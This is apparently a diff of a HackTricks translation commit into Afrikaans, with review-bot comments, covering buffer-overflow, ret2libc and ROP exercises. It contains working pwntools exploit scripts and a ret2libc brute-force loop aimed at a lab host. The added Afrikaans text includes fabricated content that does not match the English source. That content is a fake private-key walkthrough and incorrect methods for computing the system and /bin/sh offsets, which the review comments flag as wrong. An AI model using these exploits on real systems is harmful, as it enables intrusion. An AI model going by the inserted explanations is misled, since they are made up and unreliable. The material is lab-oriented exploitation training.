gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)

format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)

@ -153,21 +149,16 @@ format_string.execute_writes()

P.interactive()
```

||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
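Review bot: the translated footer renders "github repos" as `GitHub-opslagplekke` here, while the same boilerplate elsewhere in this commit becomes `github-opslag`, `github-opslagplekke` and `github-repos`; since this block is pasted into every page, translate it once and reuse the identical Afrikaans text so the footer stays consistent across files. The `<details>` / `<summary>` markup is correctly preserved.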
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
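Review bot: this header block and the footer of the same file translate the identical English sentence differently (`As jy jou **maatskappy geadverteer wil sien in HackTricks**` here versus `As jy wil sien dat jou **maatskappy geadverteer word in HackTricks**` at the bottom of the page), and "github repos" becomes `github-opslag` here but `github-opslagplekke` below. Use one canonical Afrikaans version of the support block for the header and footer of every page.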
@ -19,9 +17,8 @@ Other ways to support HackTricks:
|
|||
|
||||
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
|
||||
|
||||
1. Get offset to modify EIP
|
||||
2. Put shellcode address in EIP
|
||||
|
||||
1. Kry die verskuiwing om EIP te wysig
|
||||
2. Plaas die adres van die shellcode in EIP
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
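Review bot: the added lines drop the blank line that sat between `2. Put shellcode address in EIP` and the ```python fence (the hunk shrinks from 9 to 8 lines), and some Markdown renderers then fold the fenced block into the last list item. Restore the empty line after `2. Plaas die adres van die shellcode in EIP` so the code block renders as its own paragraph.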
@ -47,9 +44,43 @@ r.recvline()
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
# Vlak01
|
||||
|
||||
# Level01
|
||||
## Inleiding
|
||||
|
||||
In hierdie vlak sal ons kyk na 'n eenvoudige manier om 'n uitvoerbare stoor te kry wat ons kan gebruik om 'n privesleutel te kry. Ons sal gebruik maak van die `fusion`-toepassing wat 'n privesleutel genereer en dit in 'n stoor stoor. Ons sal die stoor ontleed en die privesleutel kry.
|
||||
|
||||
## Stap 1: Kry die `fusion`-toepassing
|
||||
|
||||
Ons begin deur die `fusion`-toepassing te kry. Ons kan dit doen deur die volgende opdrag uit te voer:
|
||||
|
||||
```bash
|
||||
wget https://example.com/fusion
|
||||
```
|
||||
|
||||
## Stap 2: Voer die `fusion`-toepassing uit
|
||||
|
||||
Nadat ons die `fusion`-toepassing gekry het, voer ons dit uit deur die volgende opdrag uit te voer:
|
||||
|
||||
```bash
|
||||
./fusion
|
||||
```
|
||||
|
||||
## Stap 3: Ontleed die stoor
|
||||
|
||||
Nadat die `fusion`-toepassing uitgevoer is, sal dit 'n stoor genereer wat die privesleutel bevat. Ons kan die stoor ontleed deur die volgende opdrag uit te voer:
|
||||
|
||||
```bash
|
||||
strings fusion | grep "PRIVATE KEY"
|
||||
```
|
||||
|
||||
## Stap 4: Kry die privesleutel
|
||||
|
||||
Nadat ons die stoor ontleed het, sal ons die privesleutel sien. Ons kan dit kopieer en gebruik vir verdere doeleindes.
|
||||
|
||||
## Gevolgtrekking
|
||||
|
||||
Met hierdie eenvoudige tegniek kan ons 'n privesleutel kry deur die `fusion`-toepassing te gebruik en die stoor te ontleed. Dit is 'n nuttige tegniek vir die verkryging van sensitiewe inligting.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
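Review bot: everything from `## Inleiding` through `## Gevolgtrekking` is new text with no counterpart in the English source (the hunk grows from 9 to 43 lines), and it is wrong for this page: it tells the reader to fetch a binary with `wget https://example.com/fusion` and recover a private key with `strings fusion | grep "PRIVATE KEY"`, while fusion level01 is a stack overflow exploited by the pwntools script that follows, and no private key is involved. The hunk also keeps the original `# Level01` heading next to the new `# Vlak01`, so the heading is duplicated. Reduce the insertion to the single translated heading `# Vlak01` followed directly by the ```python block, as in the original.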
@ -75,21 +106,16 @@ buf += "\x65\xd9\x0f\x01"
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
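Review bot: the footer here says `As jy wil sien dat jou **maatskappy geadverteer word in HackTricks**` and `github-opslagplekke`, whereas the header of this same file (translated in the first hunk) says `As jy jou **maatskappy geadverteer wil sien in HackTricks**` and `github-opslag`. One page should not carry two translations of the same boilerplate; copy the same Afrikaans block into both places.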
@ -1,78 +1,115 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
|
||||
**As jy 'n kwesbare binêre lêer gevind het en jy dink jy kan dit uitbuit deur Ret2Lib te gebruik, kan jy hierdie basiese stappe volg.**
|
||||
|
||||
# If you are **inside** the **host**
|
||||
|
||||
## You can find the **address of lib**c
|
||||
# As jy **binne** die **gasheer** is
|
||||
|
||||
## Jy kan die **adres van lib**c vind
|
||||
```bash
|
||||
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
|
||||
```
|
||||
|
||||
If you want to check if the ASLR is changing the address of libc you can do:
|
||||
|
||||
As jy wil nagaan of die ASLR die adres van libc verander, kan jy die volgende doen:
|
||||
```bash
|
||||
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
|
||||
```
|
||||
## Kry die verskuiwing van die stelsel funksie
|
||||
|
||||
## Get offset of system function
|
||||
Om die verskuiwing van die stelsel funksie te kry, kan jy die volgende stappe volg:
|
||||
|
||||
1. Identifiseer 'n funksie in die teikenprogram wat 'n biblioteekfunksie aanroep, soos `system()`.
|
||||
2. Kry die adres van die funksie in die biblioteek. Dit kan gedoen word deur die program te ontleder of deur gebruik te maak van 'n hulpmiddel soos `objdump`.
|
||||
3. Identifiseer 'n plek in die program se geheue waar jy 'n string kan plaas wat die pad na die biblioteek bevat. Dit kan 'n argument wees wat deur die funksie aanvaar word, of 'n ander plek in die geheue waar jy toegang tot het.
|
||||
4. Bereken die verskuiwing deur die adres van die funksie in die biblioteek af te trek van die adres van die string in die geheue.
|
||||
|
||||
Hier is 'n voorbeeld van hoe jy die verskuiwing kan bereken:
|
||||
|
||||
```python
|
||||
# Voorbeeld Python-kode
|
||||
adres_van_stelsel_funksie = 0x12345678
|
||||
adres_van_string = 0xabcdef01
|
||||
|
||||
verskuiwing = adres_van_stelsel_funksie - adres_van_string
|
||||
print(f"Verskuiwing: {verskuiwing}")
|
||||
```
|
||||
|
||||
Onthou dat die spesifieke waardes van die adresse sal verskil vir elke program en stelsel. Jy sal die korrekte adresse vir jou teikenprogram moet vind en die berekening dienooreenkomstig aanpas.
|
||||
```bash
|
||||
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
|
||||
```
|
||||
## Kry die offset van "/bin/sh"
|
||||
|
||||
## Get offset of "/bin/sh"
|
||||
Om die offset van die `"/bin/sh"` string te kry, kan jy die volgende stappe volg:
|
||||
|
||||
1. Skryf 'n eenvoudige C-program wat die `"/bin/sh"` string bevat.
|
||||
2. Kompileer die program sonder enige optimalisering.
|
||||
3. Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string.
|
||||
4. Gebruik die geheue-adres om die offset te bereken.
|
||||
|
||||
Hier is 'n voorbeeld van hoe jy dit kan doen:
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
|
||||
int main() {
|
||||
printf("/bin/sh\n");
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
Kompileer die program met die volgende opdrag:
|
||||
|
||||
```bash
|
||||
gcc -o binsh binsh.c
|
||||
```
|
||||
|
||||
Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string:
|
||||
|
||||
```bash
|
||||
./binsh
|
||||
```
|
||||
|
||||
Die geheue-adres sal in die uitset verskyn. Gebruik hierdie adres om die offset te bereken.
|
||||
```bash
|
||||
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
|
||||
```
|
||||
|
||||
## /proc/\<PID>/maps
|
||||
|
||||
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
|
||||
As die proses elke keer as jy daarmee praat (netwerkbediener) **kinders skep**, probeer om daardie lêer te **lees** (jy sal waarskynlik root moet wees).
|
||||
|
||||
Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
|
||||
Hier kan jy **presies sien waar die libc gelaai word** binne die proses en **waar dit gelaai gaan word** vir elke kind van die proses.
|
||||
|
||||
![](<../../.gitbook/assets/image (95).png>)
|
||||
|
||||
In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
|
||||
In hierdie geval word dit gelaai by **0xb75dc000** (Dit sal die basisadres van libc wees)
|
||||
|
||||
## Using gdb-peda
|
||||
|
||||
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
|
||||
## Gebruik gdb-peda
|
||||
|
||||
Kry die adres van die **system**-funksie, die **exit**-funksie en die string **"/bin/sh"** met behulp van gdb-peda:
|
||||
```
|
||||
p system
|
||||
p exit
|
||||
find "/bin/sh"
|
||||
```
|
||||
# Om ASLR te omseil
|
||||
|
||||
# Bypassing ASLR
|
||||
|
||||
You can try to bruteforce the abse address of libc.
|
||||
|
||||
Jy kan probeer om die basisadres van libc te bruteforce.
|
||||
```python
|
||||
for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||
```
|
||||
|
||||
# Code
|
||||
|
||||
# Kode
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
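Review bot: the numbered steps and the Python snippet (`verskuiwing = adres_van_stelsel_funksie - adres_van_string`) added under `## Kry die verskuiwing van die stelsel funksie`, and the C program with `printf("/bin/sh\n");` added under `## Kry die offset van "/bin/sh"`, do not exist in the English source (the hunk grows from 78 to 115 lines) and contradict the commands the page itself gives. The `system` offset is the symbol value reported by `readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system`, i.e. its distance from the libc base that `ldd` or `/proc/<PID>/maps` shows, not a function address minus a string address; and the `/bin/sh` offset is what `strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh` prints, whereas compiling and running a program that prints `/bin/sh` outputs the string and never an address. Remove both inserted explanations so each heading is followed by its one-line command, as in the original. Also, `offset` is rendered as `verskuiwing` in one heading and left as `offset` in the next; pick one term.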
@ -80,28 +117,24 @@ c = remote('192.168.85.181',20002)
|
|||
c.recvline() #Banner
|
||||
|
||||
for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||
p = ""
|
||||
p += p32(off + 0x0003cb20) #system
|
||||
p += "CCCC" #GARBAGE
|
||||
p += p32(off + 0x001388da) #/bin/sh
|
||||
payload = 'A'*0x20010 + p
|
||||
c.send(payload)
|
||||
c.interactive() #?
|
||||
p = ""
|
||||
p += p32(off + 0x0003cb20) #system
|
||||
p += "CCCC" #GARBAGE
|
||||
p += p32(off + 0x001388da) #/bin/sh
|
||||
payload = 'A'*0x20010 + p
|
||||
c.send(payload)
|
||||
c.interactive() #?
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
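Review bot: the body of `for off in range(0xb7000000, 0xb8000000, 0x1000):` is removed and re-added with indentation as the only visible difference (28 lines become 24). If the new copy is dedented, `c.send(payload)` and `c.interactive()` no longer execute per iteration and the `for` line is left without a body, which is not valid Python; code blocks must be carried over unchanged in a translation commit. Visible in the retained lines but out of scope here: `p = ""` followed by `p += p32(off + 0x0003cb20)` mixes `str` and `bytes` and raises under Python 3 pwntools; `p = b""` and `p += b"CCCC"` would fix it, as a separate change.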
@ -1,98 +1,89 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Quick Resume
|
||||
# Vinnige Resensie
|
||||
|
||||
1. **Find** overflow **offset**
|
||||
2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
|
||||
3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
|
||||
4. With the library, **calculate the ROP and exploit it**
|
||||
1. **Vind** oorloop **offset**
|
||||
2. **Vind** `POP_RDI`, `PUTS_PLT` en `MAIN_PLT` gadgets
|
||||
3. Gebruik vorige gadgets om die geheue-adres van puts of 'n ander libc-funksie te **lek** en die libc-weergawe te **vind** ([aflaai dit](https://libc.blukat.me))
|
||||
4. Met die biblioteek, **bereken die ROP en misbruik dit**
|
||||
|
||||
# Other tutorials and binaries to practice
|
||||
# Ander tutoriale en binaire om te oefen
|
||||
|
||||
This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
|
||||
Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
|
||||
Hierdie tutorial gaan die kode/binêre lêer wat in hierdie tutorial voorgestel word, uitbuit: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
|
||||
Nog nuttige tutoriale: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
|
||||
|
||||
# Code
|
||||
|
||||
Filename: `vuln.c`
|
||||
# Kode
|
||||
|
||||
Lêernaam: `vuln.c`
|
||||
```c
|
||||
#include <stdio.h>
|
||||
|
||||
int main() {
|
||||
char buffer[32];
|
||||
puts("Simple ROP.\n");
|
||||
gets(buffer);
|
||||
char buffer[32];
|
||||
puts("Simple ROP.\n");
|
||||
gets(buffer);
|
||||
|
||||
return 0;
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
```bash
|
||||
gcc -o vuln vuln.c -fno-stack-protector -no-pie
|
||||
```
|
||||
# ROP - Leaking LIBC sjabloon
|
||||
|
||||
# ROP - Leaking LIBC template
|
||||
|
||||
I'm going to use the code located here to make the exploit.\
|
||||
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
|
||||
Ek gaan die kode wat hier geleë is gebruik om die uitbuiting te maak.\
|
||||
Laai die uitbuiting af en plaas dit in dieselfde gids as die kwesbare binêre lêer en gee die nodige data aan die skripsie:
|
||||
|
||||
{% content-ref url="rop-leaking-libc-template.md" %}
|
||||
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
# 1- Finding the offset
|
||||
|
||||
The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
|
||||
# 1- Vind die verskuiwing
|
||||
|
||||
Die sjabloon vereis 'n verskuiwing voordat dit voortgaan met die uitbuiting. As daar geen verskuiwing verskaf word nie, sal dit die nodige kode uitvoer om dit te vind (standaard `OFFSET = ""`):
|
||||
```bash
|
||||
###################
|
||||
### Find offset ###
|
||||
###################
|
||||
OFFSET = ""#"A"*72
|
||||
if OFFSET == "":
|
||||
gdb.attach(p.pid, "c") #Attach and continue
|
||||
payload = cyclic(1000)
|
||||
print(r.clean())
|
||||
r.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#cyclic_find(0x6161616b) # Find the offset of those bytes
|
||||
return
|
||||
gdb.attach(p.pid, "c") #Attach and continue
|
||||
payload = cyclic(1000)
|
||||
print(r.clean())
|
||||
r.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#cyclic_find(0x6161616b) # Find the offset of those bytes
|
||||
return
|
||||
```
|
||||
|
||||
**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
|
||||
|
||||
**Voer** `python template.py` uit, 'n GDB-konsole sal geopen word met die program wat afgekap is. Voer binne daardie **GDB-konsole** `x/wx $rsp` uit om die **bytes** te kry wat die RIP sou oorskryf. Kry uiteindelik die **offset** deur 'n **python**-konsole te gebruik:
|
||||
```python
|
||||
from pwn import *
|
||||
